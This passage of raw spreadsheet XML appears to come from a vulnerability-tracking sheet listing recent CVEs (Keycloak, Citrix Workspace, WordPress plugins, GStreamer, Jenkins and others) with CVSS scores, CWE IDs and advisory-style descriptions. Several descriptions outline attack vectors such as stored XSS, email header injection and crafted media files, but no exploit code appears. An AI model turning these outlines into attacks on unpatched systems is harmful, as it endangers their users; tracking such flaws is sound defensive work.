      <c r="E854" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F854" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G854" s="5" t="inlineStr"/>
      <c r="H854" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I854" s="5" t="inlineStr"/>
      <c r="J854" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K854" s="5" t="inlineStr"/>
      <c r="L854" s="5" t="inlineStr"/>
      <c r="M854" s="5" t="inlineStr"/>
      <c r="N854" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O854" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P854" s="5" t="inlineStr"/>
      <c r="Q854" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R854" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Dynamic Client Registration service of Keycloak, an open-source identity and access management solution. The issue occurs when a user with the view-clients role accesses the client registration endpoint to retrieve client details. Due to a failure to mask sensitive information, the service returns the client's confidential secret in cleartext. This could allow a read-only administrator to obtain full access to the affected client's account and potentially escalate their privileges within the realm.</t>
        </is>
      </c>
      <c r="S854" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89298</t>
        </is>
      </c>
    </row>
    <row r="855">
      <c r="A855" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B855" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C855" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78546</t>
        </is>
      </c>
      <c r="D855" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E855" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F855" s="5" t="inlineStr">
        <is>
          <t>secure@citrix.com</t>
        </is>
      </c>
      <c r="G855" s="5" t="inlineStr"/>
      <c r="H855" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I855" s="5" t="inlineStr"/>
      <c r="J855" s="5" t="inlineStr"/>
      <c r="K855" s="5" t="inlineStr"/>
      <c r="L855" s="5" t="inlineStr"/>
      <c r="M855" s="5" t="inlineStr"/>
      <c r="N855" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O855" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P855" s="5" t="inlineStr"/>
      <c r="Q855" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R855" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read vulnerability in Citirx Workspace app for Windows.
This issue affects Workspace app for Windows: before 2603.11 Current Release (CR), before 2507.1 LTSR CU3, and before LTSR 2607.</t>
        </is>
      </c>
      <c r="S855" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78546</t>
        </is>
      </c>
    </row>
    <row r="856">
      <c r="A856" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B856" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C856" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81918</t>
        </is>
      </c>
      <c r="D856" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E856" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F856" s="5" t="inlineStr">
        <is>
          <t>ff5b8ace-8b95-4078-9743-eac1ca5451de</t>
        </is>
      </c>
      <c r="G856" s="5" t="inlineStr"/>
      <c r="H856" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I856" s="5" t="inlineStr"/>
      <c r="J856" s="5" t="inlineStr"/>
      <c r="K856" s="5" t="inlineStr"/>
      <c r="L856" s="5" t="inlineStr"/>
      <c r="M856" s="5" t="inlineStr"/>
      <c r="N856" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O856" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P856" s="5" t="inlineStr"/>
      <c r="Q856" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R856" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS below 9.5.3 is vulnerable to Stored XSS via the Date Format field in the Page Attribute Display block. A user with edit_page_contents permissions could store a payload which executes in the browser of any visitor who viewed a page where the block was configured to display a date-type attribute. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 4.8 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Oriol Ortiz for reporting.</t>
        </is>
      </c>
      <c r="S856" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81918</t>
        </is>
      </c>
    </row>
    <row r="857">
      <c r="A857" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B857" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C857" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86813</t>
        </is>
      </c>
      <c r="D857" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E857" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F857" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G857" s="5" t="inlineStr"/>
      <c r="H857" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I857" s="5" t="inlineStr"/>
      <c r="J857" s="5" t="inlineStr"/>
      <c r="K857" s="5" t="inlineStr"/>
      <c r="L857" s="5" t="inlineStr"/>
      <c r="M857" s="5" t="inlineStr"/>
      <c r="N857" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O857" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P857" s="5" t="inlineStr"/>
      <c r="Q857" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="R857" s="5" t="inlineStr">
        <is>
          <t>The MetForm WordPress plugin before 4.1.9 does not properly neutralize newline characters in user-submitted values that are placed into notification email headers, allowing unauthenticated attackers to inject additional email headers, such as Bcc, into the emails the site sends when a submitted field value is configured to populate a header.</t>
        </is>
      </c>
      <c r="S857" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86813</t>
        </is>
      </c>
    </row>
    <row r="858">
      <c r="A858" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B858" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C858" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78452</t>
        </is>
      </c>
      <c r="D858" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E858" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F858" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G858" s="5" t="inlineStr"/>
      <c r="H858" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I858" s="5" t="inlineStr"/>
      <c r="J858" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K858"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858" s="5" t="inlineStr"/>
      <c r="M858" s="5" t="inlineStr"/>
      <c r="N858" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O858" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P858" s="5" t="inlineStr"/>
      <c r="Q858" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R858" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Windows SCSI Class System File allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="S858" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78452</t>
        </is>
      </c>
    </row>
    <row r="859">
      <c r="A859" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B859" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C859" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78547</t>
        </is>
      </c>
      <c r="D859" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E859" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F859" s="5" t="inlineStr">
        <is>
          <t>secure@citrix.com</t>
        </is>
      </c>
      <c r="G859" s="5" t="inlineStr"/>
      <c r="H859" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I859" s="5" t="inlineStr"/>
      <c r="J859" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K859" s="5" t="inlineStr"/>
      <c r="L859" s="5" t="inlineStr"/>
      <c r="M859" s="5" t="inlineStr"/>
      <c r="N859" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O859" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P859" s="5" t="inlineStr"/>
      <c r="Q859" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R859" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write vulnerability in Citrix Citrix Workspace app for Windows.
This issue affects Citrix Workspace app for Windows: before 2603.11 Current Release (CR), before 2507.1 LTSR CU3, and before LTSR 2607.</t>
        </is>
      </c>
      <c r="S859" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78547</t>
        </is>
      </c>
    </row>
    <row r="860">
      <c r="A860" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B860" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C860" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88914</t>
        </is>
      </c>
      <c r="D860" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E860" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F860" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G860" s="5" t="inlineStr"/>
      <c r="H860" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I860" s="5" t="inlineStr"/>
      <c r="J860" s="5" t="inlineStr"/>
      <c r="K860" s="5" t="inlineStr"/>
      <c r="L860" s="5" t="inlineStr"/>
      <c r="M860" s="5" t="inlineStr"/>
      <c r="N860" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O860" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P860" s="5" t="inlineStr"/>
      <c r="Q860" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R860" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GStreamer's gst-plugins-good isomp4 plugin. When processing a specially crafted MP4 or MOV file containing CEA-608 closed-caption data, an integer overflow in 32-bit unsigned arithmetic can bypass a bounds check in the caption parser. This leads to an out-of-bounds heap read of up to 244 bytes, which is then included in the downstream caption output. An attacker could exploit this by tricking a user into opening a malicious media file, potentially resulting in disclosure of adjacent heap memory or application crash.</t>
        </is>
      </c>
      <c r="S860" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88914</t>
        </is>
      </c>
    </row>
    <row r="861">
      <c r="A861" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B861" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C861" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-12145</t>
        </is>
      </c>
      <c r="D861" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E861" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F861" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G861" s="5" t="inlineStr"/>
      <c r="H861" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I861" s="5" t="inlineStr"/>
      <c r="J861" s="5" t="inlineStr"/>
      <c r="K861" s="5" t="inlineStr"/>
      <c r="L861" s="5" t="inlineStr"/>
      <c r="M861" s="5" t="inlineStr"/>
      <c r="N861" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O861" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P861" s="5" t="inlineStr"/>
      <c r="Q861" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R861" s="5" t="inlineStr">
        <is>
          <t>The BuddyPress plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 14.3.3 via the bp_notifications_action_bulk_manage due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete/mark as read/mark as unread notifications of other users.</t>
        </is>
      </c>
      <c r="S861" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-12145</t>
        </is>
      </c>
    </row>
    <row r="862">
      <c r="A862" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B862" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C862" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14566</t>
        </is>
      </c>
      <c r="D862" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E862" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F862" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G862" s="5" t="inlineStr"/>
      <c r="H862" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I862" s="5" t="inlineStr"/>
      <c r="J862" s="5" t="inlineStr"/>
      <c r="K862" s="5" t="inlineStr"/>
      <c r="L862" s="5" t="inlineStr"/>
      <c r="M862" s="5" t="inlineStr"/>
      <c r="N862" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O862" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P862" s="5" t="inlineStr"/>
      <c r="Q862" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R862" s="5" t="inlineStr">
        <is>
          <t>The advanced-customized-prompts WordPress plugin through 1.0.1 does not perform any capability, ownership, or nonce check before updating WooCommerce order item metadata for a supplied order, allowing any authenticated user such as a subscriber to tamper with the custom metadata of orders belonging to other customers.</t>
        </is>
      </c>
      <c r="S862" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14566</t>
        </is>
      </c>
    </row>
    <row r="863">
      <c r="A863" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B863" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C863" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19946</t>
        </is>
      </c>
      <c r="D863" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E863" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F863" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G863" s="5" t="inlineStr"/>
      <c r="H863" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I863" s="5" t="inlineStr"/>
      <c r="J863" s="5" t="inlineStr"/>
      <c r="K863" s="5" t="inlineStr"/>
      <c r="L863" s="5" t="inlineStr"/>
      <c r="M863" s="5" t="inlineStr"/>
      <c r="N863" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O863" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P863" s="5" t="inlineStr"/>
      <c r="Q863" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R863" s="5" t="inlineStr">
        <is>
          <t>The Awesome Support plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 6.3.9. This is due to a missing capability check on the wpas_do_mr_deny_user() function, which unlike its counterpart wpas_do_mr_activate_user() does not enforce current_user_can('edit_users') or current_user_can('edit_user', $user_id), relying solely on a nonce that is not scoped to the target user. This makes it possible for authenticated attackers, with subscriber-level access and above, to set the mr_user_denied flag on any user account — including administrators — permanently blocking their moderated activation and dispatching a denial notification email to the victim.</t>
        </is>
      </c>
      <c r="S863" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19946</t>
        </is>
      </c>
    </row>
    <row r="864">
      <c r="A864" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B864" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C864" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49439</t>
        </is>
      </c>
      <c r="D864" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E864" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F864" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G864" s="5" t="inlineStr"/>
      <c r="H864" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I864" s="5" t="inlineStr"/>
      <c r="J864" s="5" t="inlineStr"/>
      <c r="K864" s="5" t="inlineStr"/>
      <c r="L864" s="5" t="inlineStr"/>
      <c r="M864" s="5" t="inlineStr"/>
      <c r="N864" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O864" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P864" s="5" t="inlineStr"/>
      <c r="Q864" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R864" s="5" t="inlineStr">
        <is>
          <t>OpenRemote is an open-source internet-of-things platform. Prior to version 1.24.1, the predicted datapoint write endpoint allows users with only `read:assets` privileges to write predicted datapoints. Version 1.24.1 fixes the issue.</t>
        </is>
      </c>
      <c r="S864" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49439</t>
        </is>
      </c>
    </row>
    <row r="865">
      <c r="A865" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B865" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C865" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62113</t>
        </is>
      </c>
      <c r="D865" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E865" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F865" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G865" s="5" t="inlineStr"/>
      <c r="H865" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I865" s="5" t="inlineStr"/>
      <c r="J865" s="5" t="inlineStr"/>
      <c r="K865" s="5" t="inlineStr"/>
      <c r="L865" s="5" t="inlineStr"/>
      <c r="M865" s="5" t="inlineStr"/>
      <c r="N865" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O865" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P865" s="5" t="inlineStr"/>
      <c r="Q865" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R865" s="5" t="inlineStr">
        <is>
          <t>Contributor Insecure Direct Object References (IDOR) in Slim SEO &lt;= 4.10.0 versions.</t>
        </is>
      </c>
      <c r="S865" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62113</t>
        </is>
      </c>
    </row>
    <row r="866">
      <c r="A866" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B866" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C866" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62134</t>
        </is>
      </c>
      <c r="D866" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E866" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F866" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G866" s="5" t="inlineStr"/>
      <c r="H866" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I866" s="5" t="inlineStr"/>
      <c r="J866" s="5" t="inlineStr"/>
      <c r="K866" s="5" t="inlineStr"/>
      <c r="L866" s="5" t="inlineStr"/>
      <c r="M866" s="5" t="inlineStr"/>
      <c r="N866" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O866" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P866" s="5" t="inlineStr"/>
      <c r="Q866" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R866" s="5" t="inlineStr">
        <is>
          <t>Contributor Insecure Direct Object References (IDOR) in Starter Templates &lt;= 4.7.5 versions.</t>
        </is>
      </c>
      <c r="S866" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62134</t>
        </is>
      </c>
    </row>
    <row r="867">
      <c r="A867" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B867" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C867" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62139</t>
        </is>
      </c>
      <c r="D867" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E867" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F867" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G867" s="5" t="inlineStr"/>
      <c r="H867" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I867" s="5" t="inlineStr"/>
      <c r="J867" s="5" t="inlineStr"/>
      <c r="K867" s="5" t="inlineStr"/>
      <c r="L867" s="5" t="inlineStr"/>
      <c r="M867" s="5" t="inlineStr"/>
      <c r="N867" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O867" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P867" s="5" t="inlineStr"/>
      <c r="Q867" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R867" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Request Forgery (CSRF) in Site Kit by Google &lt;= 1.186.0 versions.</t>
        </is>
      </c>
      <c r="S867" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62139</t>
        </is>
      </c>
    </row>
    <row r="868">
      <c r="A868" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B868" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C868" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66798</t>
        </is>
      </c>
      <c r="D868" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E868" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F868" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G868" s="5" t="inlineStr"/>
      <c r="H868" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I868" s="5" t="inlineStr"/>
      <c r="J868" s="5" t="inlineStr"/>
      <c r="K868" s="5" t="inlineStr">
        <is>
          <t>microsoft:edge_chromium</t>
        </is>
      </c>
      <c r="L868" s="5" t="inlineStr"/>
      <c r="M868" s="5" t="inlineStr"/>
      <c r="N868" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O868" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P868" s="5" t="inlineStr"/>
      <c r="Q868" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R868" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Edge (Chromium-based) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S868" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66798</t>
        </is>
      </c>
    </row>
    <row r="869">
      <c r="A869" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B869" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C869" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78455</t>
        </is>
      </c>
      <c r="D869" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E869" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F869" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G869" s="5" t="inlineStr"/>
      <c r="H869" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I869" s="5" t="inlineStr"/>
      <c r="J869" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K86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69" s="5" t="inlineStr"/>
      <c r="M869" s="5" t="inlineStr"/>
      <c r="N869" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O869" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P869" s="5" t="inlineStr"/>
      <c r="Q869" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R869" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Xbox allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="S869" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78455</t>
        </is>
      </c>
    </row>
    <row r="870">
      <c r="A870" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B870" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C870" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84646</t>
        </is>
      </c>
      <c r="D870" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E870" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F870" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G870" s="5" t="inlineStr"/>
      <c r="H870" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I870" s="5" t="inlineStr"/>
      <c r="J870" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K870" s="5" t="inlineStr">
        <is>
          <t>jenkins:jenkins</t>
        </is>
      </c>
      <c r="L870" s="5" t="inlineStr"/>
      <c r="M870" s="5" t="inlineStr"/>
      <c r="N870" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O870" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P870" s="5" t="inlineStr"/>
      <c r="Q870" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R870" s="5" t="inlineStr">
        <is>
          <t>In Jenkins 2.579 and earlier, LTS 2.568.2 and earlier, user objects can appear as nested field values in other deserialized XML objects, allowing attackers with Overall/Read permission to create user objects by submitting crafted XML.</t>
        </is>
      </c>
      <c r="S870" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84646</t>
        </is>
      </c>
    </row>
    <row r="871">
      <c r="A871" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B871" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C871" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8615</t>
        </is>
      </c>
      <c r="D871" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E871" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F871" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G871" s="5" t="inlineStr"/>
      <c r="H871" s="5" t="n">
        <v>0.002</v>
